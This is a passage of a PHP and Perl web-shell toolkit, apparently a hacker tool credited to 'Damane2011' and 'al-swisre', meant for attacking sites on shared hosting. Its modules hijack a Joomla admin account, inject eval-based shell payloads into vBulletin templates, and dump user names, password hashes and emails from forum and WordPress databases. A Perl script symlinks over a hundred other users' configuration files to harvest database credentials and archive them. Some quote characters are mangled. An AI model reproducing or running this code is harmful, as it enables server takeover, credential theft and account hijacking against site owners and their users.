     <td>dbprefix&nbsp;&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="jop" value="jos_users" /></td>
</tr>


<tr>
     <td>Email admin&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="email" /></td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form> </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$jop  = $_POST['jop'];
$email  = $_POST['email'];

if(isset($host) ) {
$con =  @ mysql_connect($host,$user,$pass) or die ;
$sedb = @ mysql_select_db($db) or die;


$query= @ mysql_query("UPDATE $jop SET email ='".$email."' WHERE id = 1") or die;



if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}


  break;
// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb shell FAQ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  case 4:
  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>

</table>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>Injection Shell in faq.php</center><br /> </td>
</tr>

<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$faq  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$crypt  = "{\${eval(gzinflate(base64_decode(\'";
$crypt .= "$shell";
$crypt .= "\')))}}{\${exit()}}</textarea>";
$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
$query =@ mysql_query($sqlfaq,$con);

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;



// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb shell CALENDAR >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  case 5:
echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>Injection Shell in calendar.php</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';
//
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$crypt  = "{\${eval(gzinflate(base64_decode(\'";
$crypt .= "$shell";
$crypt .= "\')))}}{\${exit()}}</textarea>";
$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'" ;
$query =@ mysql_query($sqlfaq,$con);

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;

// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb shell search >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  case 6:
echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>Injection Shell in search.php</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$crypt  = "{\${eval(gzinflate(base64_decode(\'";
$crypt .= "$shell"; 
$crypt .= "\')))}}{\${exit()}}</textarea>";
$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'" ;
$query =@ mysql_query($sqlfaq,$con);

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;


// <<<<<<<<<<<<<<<<<<<<<< vb members >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  case 7:

  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>show members Information</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$sql = 'select * from `user`';
$query =@ mysql_query($sql,$con);

if ($query)
{

while ($row = mysql_fetch_assoc($query))
{

echo "
<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
<tr>
       <td>ID :</td>
       <td>user :</td>
       <td>pass :</td>
       <td>salt :</td>
       <td>email :</td>

</tr>

<tr>
       <td>".$row['userid']."</td>
       <td>".$row['username']."</td>
       <td>".$row['password']."</td>
        <td>".$row['salt']."</td>
        <td>".$row['email']."</td>
</tr>

</table>
                                                     -
  ";

}

  }
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}


  break;

  case 8:


  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>show members Information</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$sql = 'select * from `wp_users`';
$query =@ mysql_query($sql,$con);

if ($query)
{

while ($row = mysql_fetch_assoc($query))
{

echo "
<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
<tr>
       <td>ID :</td>
       <td>user :</td>
       <td>pass :</td>
       <td>email :</td>

</tr>

<tr>
       <td>".$row['ID']."</td>
       <td>".$row['user_login']."</td>
       <td>".$row['user_pass']."</td>
        <td>".$row['user_email']."</td>
</tr>

</table>

  ";

}

  }
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}


  break;


    case 9:


  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table class="tab2" cellpadding="4" align="center" width="45%">


<tr>
     <td>Table user :</td>
     <td colspan="6"><input type="text" name="jop" value="jos_users" /></td>
</tr>
</table>

<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
      <td> <br /><center>show members Information</center><br /> </td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$jop  = $_POST['jop'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$sql = 'select * from `bo74r_users`';
$query =@ mysql_query($sql,$con);

if ($query)
{

while ($row = mysql_fetch_assoc($query))
{

echo "
<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
<tr>
       <td>ID :</td>
       <td>user :</td>
       <td>pass :</td>
       <td>email :</td>

</tr>

<tr>
       <td>".$row['id']."</td>
       <td>".$row['username']."</td>
       <td>".$row['password']."</td>
        <td>".$row['email']."</td>
</tr>

</table>

  ";

}

  }
else if (!$query)
{
  echo "error";
}
}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;
  default:
  header("Location: $peag");
  }
  }

else
{
echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
     <td >SQL CMD :</td>
     <td><textarea rows="3" name="sql"></textarea></td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form> </div>';

$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$sql  = $_POST['sql'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;

$query =@ mysql_query($sql,$con) or die;

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
}
?>
</div>
<div class="foter"><br /><br />Cod3d by : al-swisre _ oy3@hotmail.com<br /> <br />Saudi Arabia h4x0rS</div>
<br />‘;
$file = fopen("sql_cmd.php" ,"w+");
$write = fwrite ($file ,$symlinker);
fclose($file);
echo "<a href=damane/sql_cmd.php >Click Here</a>";
}
elseif ($action == ‚joochange‘) {
if(empty($_POST[‚pwd‘])){
echo "
<FORM method=\"POST\">
Host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\"><p>
Database : <INPUT size=\"15\" value=\"database\" name=\"database\" type=\"text\"><p>
Username : <INPUT size=\"15\" value=\"db_user\" name=\"username\" type=\"text\"><p>
Password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><p>
Set A New Username For Login : <INPUT name=\"admin\" size=\"15\" value=\"Damane\"><p>
The Password is : <font color=’#FF0000′>SQL</font> <INPUT type=\"hidden\" name=\"pwd\" size=\"15\"
value=\"23f8d1a856992bf10d677d3abd482b2e:4yeeXqIbyqPlw5IhGrZnfDjpq0pqknY7\"><p>
<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}
else{
$localhost = $_POST[‚localhost‘];
$database = $_POST[‚database‘];
$username = $_POST[‚username‘];
$password = $_POST[‚password‘];
$pwd = $_POST[‚pwd‘];
$admin = $_POST[‚admin‘];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$SQL=@mysql_query("UPDATE jos_users SET username =’".$admin."‘ WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password =’".$pwd."‘ WHERE ID = 62") or die(mysql_error());
if($SQL){
echo "<b><font color=’#C0C0C0′>Success <br>~ Coded By
</font><font color=’#FF0000′>Damane2011</font><font color=’#C0C0C0′>";}
}
}
elseif($action == "vbchange") {
if(empty($_POST[‚index‘])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"forum_vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"forum_vb\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"vb\" name=\"password\" type=\"password\"><br>
<br>
<textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
<INPUT value=\"Set\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST[‚localhost‘];
$database = $_POST[‚database‘];
$username = $_POST[‚username‘];
$password = $_POST[‚password‘];
$index = $_POST[‚index‘];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\’","’",$index);
$set_index = "{\${eval(base64_decode(\’";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\‘))}}{\${exit()}}</textarea>";
$ok=@mysql_query("UPDATE template SET template =’".$set_index."‘ WHERE title =’spacer_open’") or die(mysql_error());
if($ok){
echo "!! update finish !!<br><br>";
}}}
elseif($action == "configler") {
@mkdir("config", 0755) or die("Can’t Create A new Dir !!");
@chdir("config");
$hta = ".htaccess";
$file_create = "$hta";
$file = fopen ($file_create , ‚w‘) or die ("Can’t Open File !!");
$htaccess = "";
$htaccess = "AddHandler cgi-script .dam
Options all
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html";
fwrite ( $file , $htaccess) ;
fclose ($file);
$configshell = ‚#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>.: Damane2011-Dz :.</title>
<style type="text/css">
.newStyle1 {
 font-family: Tahoma;
 font-size: x-large;
 color: #800080;
 background-color: #008000;
 text-align: center;
}
</style>
</head>
';
sub lil{
    ($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/includes/configure.php',$kola.'-shop.txt');
symlink('/home/'.$user.'/public_html/os/includes/configure.php',$kola.'-shop-os.txt');
symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$kola.'-oscom.txt');
symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.'-oscommerce.txt');
symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.'-oscommerces.txt');
symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$kola.'-shop2.txt');
symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.'-shop-shopping.txt');
symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.'-sale.txt');
symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
symlink('/home/'.$user.'/public_html/members/configuration.php',$kola.'-members.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'-4images1.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'-forum.txt');
symlink('/home/'.$user.'/public_html/forums/includes/config.php',$kola.'-forums.txt');
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'-5.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'-4.txt');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wp13.txt');
symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.'-wp13-wp.txt');
symlink('/home/'.$user.'/public_html/WP/wp-config.php',$kola.'-wp13-WP.txt');
symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.'-wp13-wp-beta.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'-wp13-beta.txt');
symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.'-wp13-press.txt');
symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.'-wp13-wordpress.txt');
symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$kola.'-wp13-Wordpress.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wp13-Wordpress.txt');
symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.'-wp13-wordpress-beta.txt');
symlink('/home/'.$user.'/public_html/news/wp-config.php',$kola.'-wp13-news.txt');
symlink('/home/'.$user.'/public_html/new/wp-config.php',$kola.'-wp13-new.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wp-blog.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'-wp-beta.txt');
symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$kola.'-wp-blogs.txt');
symlink('/home/'.$user.'/public_html/home/wp-config.php',$kola.'-wp-home.txt');
symlink('/home/'.$user.'/public_html/protal/wp-config.php',$kola.'-wp-protal.txt');
symlink('/home/'.$user.'/public_html/site/wp-config.php',$kola.'-wp-site.txt');
symlink('/home/'.$user.'/public_html/main/wp-config.php',$kola.'-wp-main.txt');
symlink('/home/'.$user.'/public_html/test/wp-config.php',$kola.'-wp-test.txt');
symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$kola.'-ibproarcade.txt');
symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$kola.'-ibproarcade.txt');
symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'-joomla2.txt');
symlink('/home/'.$user.'/public_html/protal/configuration.php',$kola.'-joomla-protal.txt');
symlink('/home/'.$user.'/public_html/joo/configuration.php',$kola.'-joo.txt');
symlink('/home/'.$user.'/public_html/cms/configuration.php',$kola.'-joomla-cms.txt');
symlink('/home/'.$user.'/public_html/site/configuration.php',$kola.'-joomla-site.txt');
symlink('/home/'.$user.'/public_html/main/configuration.php',$kola.'-joomla-main.txt');
symlink('/home/'.$user.'/public_html/news/configuration.php',$kola.'-joomla-news.txt');
symlink('/home/'.$user.'/public_html/new/configuration.php',$kola.'-joomla-new.txt');
symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'-joomla-home.txt');
symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'-vb~config.txt');
symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$kola.'-vb3~config.txt');
symlink('/home/'.$user.'/public_html/cc/includes/config.php',$kola.'-vb1~config.txt');
symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'-includes-vb.txt');
symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$kola.'-vbluttin~class_core.php.txt');
symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$kola.'-vbluttin~class_core.php1.txt');
symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$kola.'-vbluttin~class_core.php2.txt');
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'-whm15.txt');
symlink('/home/'.$user.'/public_html/central/configuration.php',$kola.'-whm-central.txt');
symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$kola.'-whm-whmcs.txt');
symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$kola.'-whm-WHMCS.txt');
symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$kola.'-whmc-WHM.txt');
symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'-whmcs.txt');
symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'-support.txt');
symlink('/home/'.$user.'/public_html/supp/configuration.php',$kola.'-supp.txt');
symlink('/home/'.$user.'/public_html/secure/configuration.php',$kola.'-sucure.txt');
symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$kola.'-sucure-whm.txt');
symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$kola.'-sucure-whmcs.txt');
symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$kola.'-cpanel.txt');
symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.'-panel.txt');
symlink('/home/'.$user.'/public_html/host/configuration.php',$kola.'-host.txt');
symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.'-hosting.txt');
symlink('/home/'.$user.'/public_html/hosts/configuration.php',$kola.'-hosts.txt');
symlink('/home/'.$user.'/public_html/configuration.php',$kola.'-joomla.txt');
symlink('/home/'.$user.'/public_html/submitticket.php',$kola.'-whmcs2.txt');
symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'-clients.txt');
symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'-client.txt');
symlink('/home/'.$user.'/public_html/clientes/configuration.php',$kola.'-clientes.txt');
symlink('/home/'.$user.'/public_html/cliente/configuration.php',$kola.'-client.txt');
symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$kola.'-clientsupport.txt');
symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'-billing.txt'); 
symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.'-whm-manage.txt'); 
symlink('/home/'.$user.'/public_html/my/configuration.php',$kola.'-whm-my.txt'); 
symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.'-whm-myshop.txt'); 
symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$kola.'-zencart.txt'); 
symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.'-shop-zencart.txt'); 
symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.'-shop-ZCshop.txt'); 
symlink('/home/'.$user.'/public_html/Settings.php',$kola.'-smf.txt'); 
symlink('/home/'.$user.'/public_html/smf/Settings.php',$kola.'-smf2.txt'); 
symlink('/home/'.$user.'/public_html/forum/Settings.php',$kola.'-smf-forum.txt'); 
symlink('/home/'.$user.'/public_html/forums/Settings.php',$kola.'-smf-forums.txt'); 
symlink('/home/'.$user.'/public_html/upload/includes/config.php',$kola.'-up.txt');
symlink('/home/'.$user.'/public_html/article/config.php',$kola.'-Nwahy.txt'); 
symlink('/home/'.$user.'/public_html/up/includes/config.php',$kola.'-up2.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'-6.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.'-7.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.'-PHP-Fusion.txt');
symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.'-9.txt');
symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'-traidnt1.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'-4images.txt');
symlink('/home/'.$user.'/public_html/sites/default/settings.php',$kola.'-Drupal.txt');
symlink('/home/'.$user.'/public_html/member/configuration.php',$kola.'-1member.txt') ; 
symlink('/home/'.$user.'/public_html/billings/configuration.php',$kola.'-billings.txt') ; 
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'-whm.txt');
symlink('/home/'.$user.'/public_html/supports/configuration.php',$kola.'-supports.txt');
symlink('/home/'.$user.'/public_html/requires/config.php',$kola.'-AM4SS-hosting.txt');
symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$kola.'-hostbills-supports.txt');
symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$kola.'-hostbills-client.txt');
symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$kola.'-hostbills-support.txt');
symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$kola.'-hostbills-billing.txt');
symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$kola.'-hostbills-billings.txt');
symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$kola.'-hostbills-host.txt');
symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$kola.'-hostbills-hosts.txt');
symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$kola.'-hostbills-hosting.txt');
symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$kola.'-hostbills-hostings.txt');
symlink('/home/'.$user.'/public_html/includes/iso4217.php',$kola.'-hostbills.txt');
symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$kola.'-hostbills-hostbills.txt');
symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$kola.'-hostbills-hostbill.txt');

}
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
} else {
  $buffer = $ENV{'QUERY_STRING'};
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
  ($name, $value) = split(/=/, $pair);
  $name =~ tr/+/ /;
  $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $value =~ tr/+/ /;
  $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $FORM{$name} = $value;
}
if ($FORM{pass} eq ""){
print '
<body class="newStyle1">
<p>.: Damane2011-Dz :.</p>
<p>Damane-Dz@hotmail.com</p>
<form method="post">
<textarea name="pass" style="width: 543px; height: 420px"></textarea>
<br />
<input name="tar" type="text" style="width: 212px" /><br />
<input name="Submit1" type="submit" value="submit" style="width: 99px" /><br />
<p>Modified By Damane2011-Dz</p>
</form>';
}else{
@lines =<$FORM{pass}>;
$y = @lines;
open (MYFILE, ">tar.tmp");
print MYFILE "tar -czf ".$FORM{tar}.".tar ";
for ($ka=0;$ka<$y;$ka++){
while(@lines[$ka]  =~ m/(.*?):x:/g){
&lil($1);
print MYFILE $1.".txt ";
for($kd=1;$kd<18;$kd++){
print MYFILE $1.$kd.".txt ";
}
}
 }
print'<body class="newStyle1">
<p>Done !!</p>
<p>&nbsp;</p>';
if($FORM{tar} ne ""){
open(INFO, "tar.tmp");
@lines =<INFO> ;
close(INFO);
system(@lines);
print'<p><a href="'.$FORM{tar}.'.tar">Click here 2 download tar file</a></p>';
}
}
 print"
</body>
</html>";‘;
$config = fopen("config.dam" ,"w+");
$write = fwrite ($config ,base64_decode($configshell));
fclose($config);
chmod("config.dam",0755);
echo "<iframe src=config/config.dam width=100% height=100% frameborder=0></iframe> ";
}
elseif ($action == ’sqlfile‘) {
if($doing=="mysqlupload"){
$file = $_FILES[‚uploadfile‘];
$filename = $file[‚tmp_name‘];
if (file_exists($savepath)) {
m(‚The goal file has already existed‘);
} else {
if(!$filename) {
m(‚Please choose a file‘);
} else {
$fp=@fopen($filename,’r‘);
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents = bin2hex($contents);
if(!$upname) $upname = $file[’name‘];
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE ‚$savepath‘;");
m($result ? ‚Upload success‘ : ‚Upload has failed: ‚.mysql_error());
}
}
}
?>
<script type="text/javascript">
function mysqlfile(doing){
if(!doing) return;
$(‚doing‘).value=doing;
$(‚mysqlfile‘).dbhost.value=$(‚dbinfo‘).dbhost.value;
$(‚mysqlfile‘).dbport.value=$(‚dbinfo‘).dbport.value;
$(‚mysqlfile‘).dbuser.value=$(‚dbinfo‘).dbuser.value;
